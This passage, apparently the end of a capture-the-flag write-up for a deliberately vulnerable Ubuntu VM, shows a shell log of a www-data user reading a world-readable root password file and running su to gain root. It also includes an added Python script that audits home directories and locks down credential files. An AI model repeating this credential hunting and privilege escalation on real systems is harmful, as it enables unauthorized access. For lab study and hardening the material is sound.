There is only one user, and we already got its password by brute force. Let's look in the home directory.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/$ cd /home
cd /home
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ ls
ls
root3r
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ ls -liah
ls -liah
total 12K
262146 drwxr-xr-x 3 root root 4.0K Oct 30 2019 .
2 drwxr-xr-x 23 root root 4.0K Oct 30 2019 ..
286738 drwxr-xr-x 3 www-data www-data 4.0K Nov 1 2019 root3r

There is a root3r user, and the current user controls that directory. Let's go in.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home$ cd root3r
cd root3r/
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ls -liah
ls -liah
total 40K
286738 drwxr-xr-x 3 www-data www-data 4.0K Nov 1 2019 .
262146 drwxr-xr-x 3 root root 4.0K Oct 30 2019 ..
282108 -rw-r--r-- 1 www-data www-data 515 Oct 30 2019 .bash_history
278324 -rw-r--r-- 1 www-data www-data 220 Oct 30 2019 .bash_logout
262821 -rw-r--r-- 1 www-data www-data 3.7K Oct 30 2019 .bashrc
286752 drwxr-xr-x 2 www-data www-data 4.0K Oct 30 2019 .cache
282130 -rw-r--r-- 1 www-data www-data 22 Oct 30 2019 .mysql_history
278338 -rw-r--r-- 1 www-data www-data 655 Oct 30 2019 .profile
282736 -rw-r--r-- 1 www-data www-data 8 Oct 31 2019 .root_password_ssh.txt
282182 -rw-r--r-- 1 www-data www-data 0 Oct 30 2019 .sudo_as_admin_successful
282524 -rw-r--r-- 1 root root 4 Nov 1 2019 test.txt

There is plenty of good stuff in this directory. Let's look at .root_password_ssh.txt first; judging by the name it may be the root password.

www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ cat .root_password_ssh.txt
sh.txtoot_password_s
willy26
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ cat .mysql_history
cat .mysql_history
_HiStOrY_V2_
exit\040
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ su -
su -
Password: _HiStOrY_V2_

su: Authentication failure
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ^[[A
su -
Password: willy26
root@ubuntu-extermely-vulnerable-m4ch1ine:~#
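
Root access here came from a world-readable .root_password_ssh.txt sitting in a home directory that www-data owned. The following Python is an added example (not part of the writeup) that walks a home tree, flags files whose names suggest credentials or command history and whose mode grants read to "other", and then strips group/other access from them; the name pattern and the temporary sample tree are constructed for this example and assume a POSIX filesystem.

```python
import os
import re
import stat
import tempfile

# File names that commonly hold credentials or command history (assumed pattern;
# the target's .root_password_ssh.txt and .mysql_history both match it).
SENSITIVE_NAME = re.compile(r"(pass|passwd|secret|token|_history|credential)", re.IGNORECASE)


def find_exposed_secret_files(home_root):
    """Return sorted paths (relative to home_root) of regular files with a credential-looking
    name whose permission bits include read for 'other' (o+r)."""
    hits = []
    for dirpath, _dirs, files in os.walk(home_root):
        for name in files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISREG(mode):
                continue
            if SENSITIVE_NAME.search(name) and mode & stat.S_IROTH:
                hits.append(os.path.relpath(full, home_root))
    return sorted(hits)


def lock_down(home_root):
    """Remediate: remove group/other read and write bits from every flagged file."""
    fixed = []
    for rel in find_exposed_secret_files(home_root):
        path = os.path.join(home_root, rel)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~(stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH))
        fixed.append(rel)
    return fixed


def build_sample_home():
    """Construct a temporary /home look-alike mirroring the listing above: a user directory
    with world-readable dotfiles, plus a correctly locked-down token for contrast."""
    root = tempfile.mkdtemp(prefix="home_")
    user = os.path.join(root, "root3r")
    os.makedirs(os.path.join(user, ".ssh"))

    def put(rel, content, mode):
        path = os.path.join(user, rel)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)

    put(".root_password_ssh.txt", "REDACTED\n", 0o644)     # world-readable credential file
    put(".mysql_history", "_HiStOrY_V2_\nexit\\040\n", 0o644)
    put(".bash_history", "ls\n", 0o644)
    put(".bashrc", "# shell config\n", 0o644)             # readable, but not sensitive by name
    put("test.txt", "ok\n", 0o644)
    put(".ssh/api_token", "PLACEHOLDER-TOKEN\n", 0o600)   # sensitive name, but no o+r bit
    return root


if __name__ == "__main__":
    home = build_sample_home()
    print("exposed:", find_exposed_secret_files(home))
    print("fixed:  ", lock_down(home))
    print("after:  ", find_exposed_secret_files(home))
```

The permission check is only half the story on this box: /home/root3r itself is owned by www-data, so the web user could also write there. A full audit would additionally compare each home directory's owner against the account it belongs to in /etc/passwd.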

Successfully switched to root. Finally, the obligatory proof screenshot.

root@ubuntu-extermely-vulnerable-m4ch1ine:~# cat proof.txt
cat proof.txt
voila you have successfully pwned me :) !!!
:D
root@ubuntu-extermely-vulnerable-m4ch1ine:~# whoami
whoami
root
root@ubuntu-extermely-vulnerable-m4ch1ine:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:06:73:f2 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global enp0s3
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe06:73f2/64 scope link
valid_lft forever preferred_lft forever
3: virbr0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
valid_lft forever preferred_lft forever
4: virbr0-nic: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN group default qlen 1000
link/ether 52:54:00:c5:7d:1b brd ff:ff:ff:ff:ff:ff
root@ubuntu-extermely-vulnerable-m4ch1ine:~# uname -a
uname -a
Linux ubuntu-extermely-vulnerable-m4ch1ine 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Source: https://i3eg1nner.github.io/2023/06/0c6297e238cc.html
Author: I3eg1nner
Published: June 27, 2023